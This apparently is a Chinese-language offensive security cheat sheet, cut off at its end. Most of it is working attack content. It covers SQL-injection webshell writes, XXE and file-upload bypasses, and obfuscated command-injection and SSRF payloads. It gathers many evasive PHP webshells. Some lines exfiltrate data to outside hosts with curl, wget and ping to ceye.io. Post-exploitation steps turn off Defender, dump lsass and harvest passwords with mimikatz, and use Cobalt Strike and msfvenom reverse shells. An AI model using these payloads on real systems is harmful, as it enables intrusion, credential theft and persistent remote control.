https://xz.aliyun.com/t/2418

sql注入getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mysql
select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php'

Sql server
存储过程xp_cmdshell
;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > D:\\WWW\\2333.aspx' ;--

Oracle
1、创建JAVA包
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
2、JAVA权限
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
3、创建函数
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
URL执行
id=602'||utl_inadd.get_host_name((select LinxRUNCMD('cmd /c dir d:/') from dual))--

postgresql
COPY (select '<?php phpinfo();?>') to '/tmp/1.php';

sqlite3
;attach database 'D:\\www\\008.php' as tt;create TABLE tt.exp (dataz text) ; insert INTO tt.exp (dataz) VALUES (x'3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e');

redis
%0D%0Aconfig%20set%20dir%20%2Fvar%2Fwww%2Fhtml2F%0D%0Aconfig%20set%20dbfilename%20shell%2Ephp%0D%0Aset%20x%2022%3C%3Fphp%20phpinfo%28%29%3B%%203F%3E%22%0D%0Asave%0D%0A

XXE bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
#utf-7 bypass
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE copyright[
+ADwAIQBFAE4AVABJAFQAWQAgAHQ-e+AHMAdAAgAFMAWQBTAFQARQBNACAAIAAiAC8-e+AHQAYwAvAHAAYQBzAHMAdwBvAHI-d+ACIAPg-
]>
<reset>             
  <login>&test;</login>            
  <secret>login</secret>
</reset>

# 当DOCTYPE不能修改时,用xiinclude來定位
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

soap xxe

<soap:Body> <foo> <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]> </foo> </soap:Body>

doc或xlsx包含xxe

xlsx和doc文件利用xxe:工具https://github.com/BuffaloWill/oxml_xxe
$ mkdir XXE && cd XXE $ unzip ../XXE.xlsx Archive: ../XXE.xlsx inflating: xl/drawings/drawing1.xml inflating: xl/worksheets/sheet1.xml inflating: xl/worksheets/_rels/sheet1.xml.rels inflating: xl/sharedStrings.xml inflating: xl/styles.xml inflating: xl/workbook.xml inflating: xl/_rels/workbook.xml.rels inflating: _rels/.rels inflating: [Content_Types].xml
添加payload到xl/workbook.xml

1
2
3
4
<xml...>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
<x>&xxe;</x>
<workbook...>

重新打包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ zip -r ../poc.xslx *
updating: [Content_Types].xml (deflated 71%)
updating: _rels/ (stored 0%)
updating: _rels/.rels (deflated 60%)
updating: docProps/ (stored 0%)
updating: docProps/app.xml (deflated 51%)
updating: docProps/core.xml (deflated 50%)
updating: xl/ (stored 0%)
updating: xl/workbook.xml (deflated 56%)
updating: xl/worksheets/ (stored 0%)
updating: xl/worksheets/sheet1.xml (deflated 53%)
updating: xl/styles.xml (deflated 60%)
updating: xl/theme/ (stored 0%)
updating: xl/theme/theme1.xml (deflated 80%)
updating: xl/_rels/ (stored 0%)
updating: xl/_rels/workbook.xml.rels (deflated 66%)
updating: xl/sharedStrings.xml (deflated 17%)

其他

https://zhuanlan.zhihu.com/p/36517036

文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
php : .jpg.php 、 .php5 、 .pHt 、 .pgif
asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm

mine头
Content-Type : application/octet-stream
Content-Type : image/jpeg
Content-Type : image/png
Content-Type : image/gif

配置文件:
.htaccess
web.config
httpd.conf
__init__.py



<%out.println("test");%>

文件上传使用oss存储

  1. 上传html配合js进行钓鱼
  2. 如果该域名在跨域传输允许里,靠该html接收跨域信息
  3. 可以上传shtml来读取文件。
    1
    2
    3
    4
    shtml用的是SSI指令,SSI是为WEB服务器提供的一套命令,这些命令只要直接嵌入到HTML文档的注释内容之中即可。
    <!--#include file="/home/www/xxxxx/index.html"--> //可以用来读文件
    <!--#exec cmd="ifconfig"--> //可以用来执行命令
    <!--#include virtual="/includes/header.html" --> //也是读文件 与FILE不同他支持绝对路径和../来跳转到父目录 而file只能读取当前目录下的

文件上传 bypass

1
2
3
apache
x.php.x  #apache老解析漏洞
1.php%OA  上传后访问/1.php%0A #CVE-2017-15715

多文件上传 bypass方法

1
2
3
4
5
6
7
8
9
10
11
------------128137731
Content-Disposition:form-data;name="file";filename="1.txt";
Content-Type:text/plain

hello
------------128137731
Content-Disposition:form-data;name="file";filename="1.php";
Content-Type:text/plain

<?= phpinfo();?>
------------128137731

来自常见的几种上传bypass.list
使用说明:

1.使用burpsuite里intruder
2.选中上传内容添加关键词
3.在payload processing中的match/replace添加
  match regex填upload_file
  replace with填原本请求包里的字段
4.重复上述3操作添加\n为%0a后,再于相同地方的decode中添加url-decode
5.将payload encoding中的url-encode these characters勾勾去掉

文件下载:upload_fuzz

下列只针对php的GD渲染库:
[Q]GD渲染 bypass:

[A]jpg生成脚本
[U] 详情看脚本注释:php jpg_payload.php xxx.jpg

rest test

1
2
3
4
5
6
7
$ git clone https://github.com/flipkart-incubator/Astra.git

$ cd Astra

$ docker build -t astra .

$ docker run --rm -it --link astra-mongo:mongo -p 8094:8094 astra

nodejs

bypass

1
{"user":"name","passwd":"password"}修改类型为{"user":[0],"passwd":[0]}

JavaScript 原型链污染

修改函数的原型,导致类/对象被定义时引入恶意代码
例子:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// foo是一个简单的JavaScript对象
let foo = {bar: 1}

// foo.bar 此时为1
console.log(foo.bar)

// 修改foo的原型(即Object)
foo.__proto__.bar = 2

// 由于查找顺序的原因,foo.bar仍然是1
console.log(foo.bar)

// 此时再用Object创建一个空的zoo对象
let zoo = {}

// 查看zoo.bar
console.log(zoo.bar)

例子:kibana 原型链污染 rce

详细:

https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html

python

ssti

Accessing parameters

In most examples we used request.args to access GET parameters, but there are other dictionaries that can be populated with custom values:

GET: request.args
Cookies: request.cookies
Headers: request.headers
Environment: request.environ
Values: request.values

The following notations can be used to access attributes of an object:

request.class
request["class"]
request|attr("class")

Elements of arrays can be accessed with:

array[0]
array.pop(0)

flask session漏洞

  • flask验证码绕过漏洞
  • Codeigniter 2 session伪造及对象注入漏洞
  • 签名使用hash函数而非hmac函数,导致利用hash长度扩展攻击来伪造session
  • 任意文件读取导致密钥泄露,进一步造成身份伪造漏洞或反序列化漏洞
  • 如果客户端session仅加密未签名,利用CBC字节翻转攻击,我们可以修改加密session中某部分数据,来达到身份伪造的目的

[U]python xx.py "加密的session"
p神脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

https://www.leavesongs.com/PENETRATION/client-session-security.html

格式化字符串

利用原理:

1
2
3
4
5
6
"{username}".format(username='phithon') # 普通用法
"{username!r}".format(username='phithon') # 等同于 repr(username)
"{number:0.2f}".format(number=0.5678) # 等同于 "%0.2f" % 0.5678,保留两位小数
"int: {0:d};  hex: {0:#x};  oct: {0:#o};  bin: {0:#b}".format(42) # 转换进制
"{user.username}".format(user=request.username) # 获取对象属性
"{arr[2]}".format(arr=[0,1,2,3,4]) # 获取数组键值

利用方法:
http://localhost:8000/?email={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}
http://localhost:8000/?email={user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY}

详细参考:

https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html
https://github.com/shiyanlou/seedlab/blob/master/formatstring.md

f修饰符与任意代码执行

python >3.6
利用原理:
f'xxxx'相当于php里${}可直接将字符串转换为代码执行

例:
print(f"{__import__('os').system('dir')}")

redirect

1
2
3
https://evil.ca/c.office.com   =>>>   https://evil.ca/c.office.com

ctf例子:https://ctftime.org/writeup/16925

https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization-wp.pdf

hadoop

模块 节点 默认端口
HDFS NameNode 50070
HDFS SecondNameNode 50090
HDFS DataNode 50075
HDFS Backup/Checkpoint node 50105
MapReduce JobTracker 50030
MapReduce TaskTracker 50060

https://www.alibabacloud.com/forum/read-848
https://www.4hou.com/technology/3787.html

漏洞利用

权限提升

waf bypass

命令注入(linux)

1
2
3
4
5
6
7
8
9
/???/?c.??????????? -e /???/b??h 2130706433 1337
curl http://xxx.ceye.io/`whoami|base64` 
curl xxx -d $(ls)

$'\154\163'         # ls
cat${IFS}///e\t\c/////\p\a\s\s\w\d #cat /etc/passwd
o=/eipq/qctc/paipq/qcsswd&&ca$*t<${o//ipq\/qc/} #cat /etc/passwd
for i in $(ls /) ; do host "$i.xxx.ceye.io"; done
${!#}<<<{$\'\\${##}$(($((${##}<<${##}))#${##}$#${##}))$((${##}<<$((${##}<<${##}))))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\',$\'\\$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}$#${##}))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${##}<<${##}))))${##}\',$\'\\$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}${##}))\'}

命令注入(windows):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
127.0.0.1|i^d
ping 127.1 -a?a&who^a^mi
powershell C:\*\*2\n??e*d.* # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # powershell calc.exe
ping 127.1 @(C:/*/*3?/w?oa*.*) # powershll环境下whoami
ping 127.1{接、-、+、@、$、,、/、^、*}(whoami)

%PATH:~2,9% 

ping %USERNAME%.xx.ceye.io
for /F %x in ('whoami') do start http://xxx.ceye.io/%x

for /F %x in ('whoami') do powershell 
$a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.
GetBytes('%x'));$b=New-Object 
System.Net.WebClient;$b.DownloadString('http://xxx.ceye.io/'+$a);

命令注入 bypass技巧汇总

关键词过滤

[+]绕过姿势:?*正则$*$@$x(x代表1-9)${x}变量"'

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
w'h'o'am'i
cat ./fl[a-z]g
cat ./fl?g
cat ./fl*g
c\at ./flag
c$6at ./flag
c$@at ./flag
c$*at ./flag
c${1}at ./flag
a=c;b=at;$a$b ./flag
a="ct1at";${a:0:1}${a:3:4} ./flag
$(printf "\x63\x61\x74\x20\x2e\x2f\x66\x6c\x61\x67")
c"a"t ./fl'ag'
{cat,./flag}
{l\s,}
c\at${IFS}{1,/etc/p}{asswd,swd}
/???/??t ./????
s=$'uname\x20-a'&&$s  #变形 o=$'\154\163';$o
IFS=,;`cat<<<cat,/etc/passwd`
cat${IFS}///e\t\c/////\p\a\s\s\w\d
空格过滤

[+]绕过姿势:<>$IFS

1
2
3
4
cat<>./flag
cat$IFS./flag
${PS2}对应">"
${9} 对应" "
空白,链接字符绕过
1
2
3
4
5
6
7
8
9
10
11
%0a(\n)
%0d(\r)
%09(\t)
%3c(<)
%1a    #win下作为.bat文件中的命令分隔符
%0d
等空白字符
id;ls
id|ls
id||ls   #需要前一个命令失败
id&&ls
n > file分段写入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# generate `ls -t>g` file
>ls\\ 
ls>_ 
>\ \\ 
>-t\\ 
>\>g 
ls>>_ 
# generate `curl baidu.com>python`
# curl baidu.com|python
>on 
>th\\ 
>py\\
>\|\\ 
>m \\ 
>co\\
>u.\\ 
>id\\ 
>ba\\ 
>\ \\ 
>rl\\ 
>cu\\ 
# exec
sh _ 
sh g
1
2
3
4
5
6
7
8
9
10
curl xxx -d `ls`
curl xxx -d $(ls)
ping %USERNAME%.xx.ceye.io

#ping -c 3 `ifconfig en0|grep "inet "|awk '{print $2}'`.test.xxx.com DNS记录获取源IP(根据情况需要修改,不通用)

Victim
wget --header=evil:$(ifconfig|xxd -p -c 100000) http://xxx.com
Attacker:
echo "0x$(ncat -lvp 9000 |grep -i evil|tr -d '/' |cut -d ' ' -f2)" |xxd -r -p

进制编码

  1. 进制编码

linux下使用xxd(16进制)

1
2
echo "ls" | xxd -p
echo "6c730a" | xxd -r -p | bash

windows下使用certutil

1
certutil -encode  1.txt 2.txt

  1. curl 进制转换的ip
1
2
3
4
http://127.1
127.00000000.000000.1
curl 0x7F000001 | bash
curl http:2130706433 | bash

基于时间

1
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi

多语言命令注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}


/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

e.g:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'

SSRF(bypass)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
ping 0--1.ipv6-literal.net      # ipv6绕过

http://[::]:80/            #localhost绕过
http://0000::1:80/

gopher://xxx/_POST/XXXX      #协议绕过
sftp://evil.com:11111/
dict://attacker:11111/
tftp://evil.com:12346/TESTUDPPACKET
ldap://localhost:11211/%0astats%0aquit
file://\/\/etc/passwd

http://localtest.me         # 重定向域名绕过
http://customer1.app.localhost.my.company.127.0.0.1.nip.io   
ping bugbounty.dod.network  == 127.0.0.2

0:0:0:0:0:ffff:127.0.0.1        #进制转换绕过
curl http:2130706433
ping 0177.1

localhost:+11211aaa              #错误的url格式绕过
localhost:00011211aaaa

curl -v "http://evil$google.com"   #仅限于curl,使用bash变量$google = ""

http://ⓐⓟⓟⓛⓔ.ⓒⓞⓜ.ⓒⓃ   = http://apple.com.cn  #字母数字绕过
show list: 
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

http://1.1.1.1 &@2.2.2.2# @3.3.3.3/  #组合绕过
urllib2 : 1.1.1.1
requests + browsers : 2.2.2.2
urllib : 3.3.3.3

0://evil.com:80;http://google.com:80/   # php  filter_var() 绕过

http://127.1.1.1:80\@127.2.2.2:80/          # 弱解析绕过
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/

url support.jpg

  • ssrf 接xss
  • ssrf调用接口
  • 思路扩展:任意文件读取下可以试下是否可以ssrf,通过http协议访问阿里云的元数据接口,查看是否有ak,sk,这样可以获取oss的存储权限。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # 调用Alibaba
    http://100.100.100.200/latest/meta-data/
    http://100.100.100.200/latest/meta-data/instance-id
    http://100.100.100.200/latest/meta-data/image-id
    # 调用docker
    http://127.0.0.1:2375/v1.24/containers/json

    Simple example
    docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
    bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
    bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json

https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

CRLF bypass

1
2
3
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
java%0d%0ascript%0d%0a:alert(0)
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
  • %E5%98%8A = %0A = \u560a
  • %E5%98%8D = %0D = \u560d
  • %E5%98%BE = %3E = \u563e (>)
  • %E5%98%BC = %3C = \u563c (<)

https://blog.zeddyu.info/2019/01/17/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
https://github.com/swisskyrepo/PayloadsAllTheThings

重定向 bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www.白名单网站.com.evil.com   #使用白名单网站绕过白名单网站

//google.com                 #使用//  绕过 http头

https:google.com             #使用https:  绕过 //过滤

\/\/google.com/              #使用\/  绕过 //过滤
/\/google.com/

/?redir=google。com           #使用。或unicode字符(℀等)或%E3%80%82 绕过.过滤
//google%E3%80%82com
http://baidu.c℆a.google.com

//google%00.com              #使用%00、%oa等字符
//google%0a.com

?next=whitelisted.com&next=google.com   #变量覆盖

baidu.com@googl.com          #@重定向

unicode速查

后门

使用:冰蝎免杀

webshell免杀(PHP)

1
2
3
4
5
6
7
8
9
+----------------+-----------------+----------------+----------------+
|    Command     | Displays Output | Can Get Output | Gets Exit Code |
+----------------+-----------------+----------------+----------------+
| system()       | Yes (as text)   | Last line only | Yes            |
| passthru()     | Yes (raw)       | No             | Yes            |
| exec()         | No              | Yes (array)    | Yes            |
| shell_exec()   | No              | Yes (string)   | No             |
| backticks (``) | No              | Yes (string)   | No             |
+----------------+-----------------+----------------+----------------+

姿势:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
`$_GET[1]`
include$_GET[1];#https://insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
<?=usort(...$_GET);#/?1[]=a&1[]=phpinfo()&2=assert

${(system)(id)}
${(system)/**/(ls)}
(system)(whoami);
(ass.(er).t)(phpinfo());
"\x61\x73\x73\x65\x72\x74"(phpinfo());
get_defined_functions()[internal][555](ls)


var_dump((substr)(__FILE__,0,-19));
<script language="php">phpinfo();@eval($_GET[_]);</script>

base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})
<?={if:1)$GLOBALS['_G'.'ET'][sky]($GLOBALS['_G'.'ET'][cool]);die();//}{end if}?>
$pi=base_convert;$pi(371235972282,10,28)(($pi(8768397090111664438,10,30))(){9})
<?= namespace c;\eval(phpinfo());?>#命名空间定义同名,程序调用时优先调用命名空间的同名函数

详细:

https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html
https://blog.zeddyu.info/2019/02/28/Some-Tricks-of-Bypass-php-waf/

1
2
<?= `ls`?> 相当于<?php echo `ls` ?>
<?= `/???/c?t /flag.???`>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
=#----------
<?=\asSert($_GET[1])?>
#-------------------
<?=(assert)($_GET[1])?>
#------------------
<?=create_function($_GET[1],1);?>
#/?1=){}phpinfo();//
#------------------
@$f = $_GET[1];
eval($s=&$f);
#------------------
$s = $_GET[1];
$d = 's';
$e = $$d;
eval($a=$e);
#------------------
eval(trim(substr(file_get_contents("http://localhost:8000/k.gif"),293930)));
#------------------
$s = '_GET';
$s = $$s;
$f = ''.[];
$ff = $f['666'=='hello'];
$d = 'ss';
$dd = 'Ert';
$ddd = $ff.$d.$dd;
$e = $ddd;
$e($s[156]);
#------------------
$a = '_GET';
$a = $$a;
$a[1]($a[2]);
#----------------
$a = $_GET[1];
$b = substr($a,0,1);
$bb = substr($a,1,2014);
eval($b.$bb);
#----------------
$a = $_GET[1];
$b = mb_substr($a,0,1);
$bb = mb_substr($a,1,2014);
eval($b.$bb);
#----------------
<?php
function user()
{
$a123 =  chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
return ''.$a123;
}
$a123 = user();
$x123 =array($_GET['x']);
array_map($a123,$a123 = $x123 );
?>
#----------------
class A{
        var $like = "demo";
        function __destruct(){
                @eval($this->like);
        }
}
$like = $_GET['hello'];
$len = strlen($like)+1;
$pp = "O:1:\"A\":1:{s:4:\"like\";s:".$len.":\"".$like.";\";}";
$s='unSer';
$ss='ialIze';
$sss=$s.$ss;
$like_unser = $sss($pp);

cs入门

windows下运行teamserver
https://evi1cg.me/archives/teamserver.html
cs简单易上手的攻略
https://boombao.net/2019/09/04/cobalt-strike-1/
完整学习:
https://github.com/aleenzz/Cobalt_Strike_wiki

argue污染

1
2
3
4
5
6
7
8
argue net1 helloworld
argue
run net1 user guest /active:yes
run net1 user guest %$83ScA1
run net1 localgroup administrators guest /add
net user guest

rdesktop  -u administrator  127.0.0.1:6666 -p c1z*W5  #rdesktop连接3389

同理可以污染其他
argue powershell.exe xxxxxxxxxxxxxxxxxxxxxxxxx

https://www.c0bra.xyz/2019/12/03/Cobalt-Strike%E7%B3%BB%E5%88%978/

横向

转发

1
goproxy https://snail007.github.io/goproxy/

socks nmap

1
nmap -sT xxx -p 445,3389

mysql 相关

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#查询用户
select host,user,password from mysql.user;
select * from mysql.user where user = substring_index(user(), '@', 1) ;
#查询目录
select @@datadir;
#查询系统类型
select @@version_compile_os,@@version_compile_machine;
#读文件
select load_file('/etc/passwd');      #/var/www/html/configuration.php
select replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32));
#写webshell,需要root权限
#先查询读写权限,若ure_file_priv为null,则不允许导入导出,若为/a表示只允许/a目录下,无具体值则不限制
show variables like '%secure%';
select "<?=$a='_GET';$a=$$a;$a[1]($a[2]);?>" into outfile '/var/www/html/connect_file.php'; 
#日志写shell
show variables like "%general%";
set global general_log='on';
SET global general_log_file='/var/www/html/1.php';
SELECT '<?php assert($_POST["cmd"]);?>';

1.msf模块,批量mysql登录检测
auxiliary/scanner/mysql/mysql_login

2.msf执行sql语句
admin/mysql/mysql_sql

3.msf mof
exploit/windows/mysql/mysql_mof
> 要求
    1.root权限
    2. --secure-file-priv不为NULL
4.msf udf
exploit/multi/mysql/mysql_udf_payload
> 要求
    1.win2000、winXP、win2003
    2.有写入权限的账户
5.msf 上传文件
exploit/windows/mysql/scrutinizer_upload_exec

window相关

1
2
#关闭defender,需要管理员权限
Set-MpPreference -disablerealtimeMonitoring $true

procdump
利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进程中

1
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz

1
2
3
4
privilege::debug  #权限提升
token::elevate
lsadump::sam
sekurlsa::logonpasswords  #抓取密码

  1. procdump+mimikatz
    需要administrator权限,需要关闭杀软,第一步需要admin权限,第二步读取本地的lsass不需要admin权限

    1
    2
    .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp 
    .\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

  2. win10 or win2012r2以上版本内存无明文密码,需要注册表开启(需要admin权限,运行完后需要注销重新登录)
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

powershell相关

1
2
#现在文件
powershell (New-Object System.Net.WebClient).DownloadFile("[url]","[path]");

msf相关

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
route #查路由
sysinfo #获取系统信息
netstat –ano #端口开放情况
getsystem #提权
idletime #查看目标机闲置时间

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389  #端口扫描

https://xz.aliyun.com/t/2536#toc-5

msf派生shell给cs

1
2
3
4
5
6
7
8
background #挂起shell到后台
sessions -l #查看shell
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http #同cs选的监听方式
set lhost cs的ip地址
set lport cs的监听端口
set session 1
set DisablePloadHandler true;

http://zone.secevery.com/article/1128

vpn password get

1
2
3
4
1.星号查看器
2.客户端正确密码后面添加$,客户端会报错将密码保存在内存中,使用procdump获取
procdump64.exe -accepteula -ma 14256 vpn.dmp
strings vpn.dmp | grep -F 'PIN:' -A 6

免杀shellcode

https://github.com/clinicallyinane/shellcode_launcher/
msf生成.c文件
流量走https,防止被监听/察觉出异常

python msf bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
注意!python要在3.4以下,先安装py2exe 
python –m pip install py2exe 

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.78.128 LPORT=9233  -f raw > start.py

生成如下:
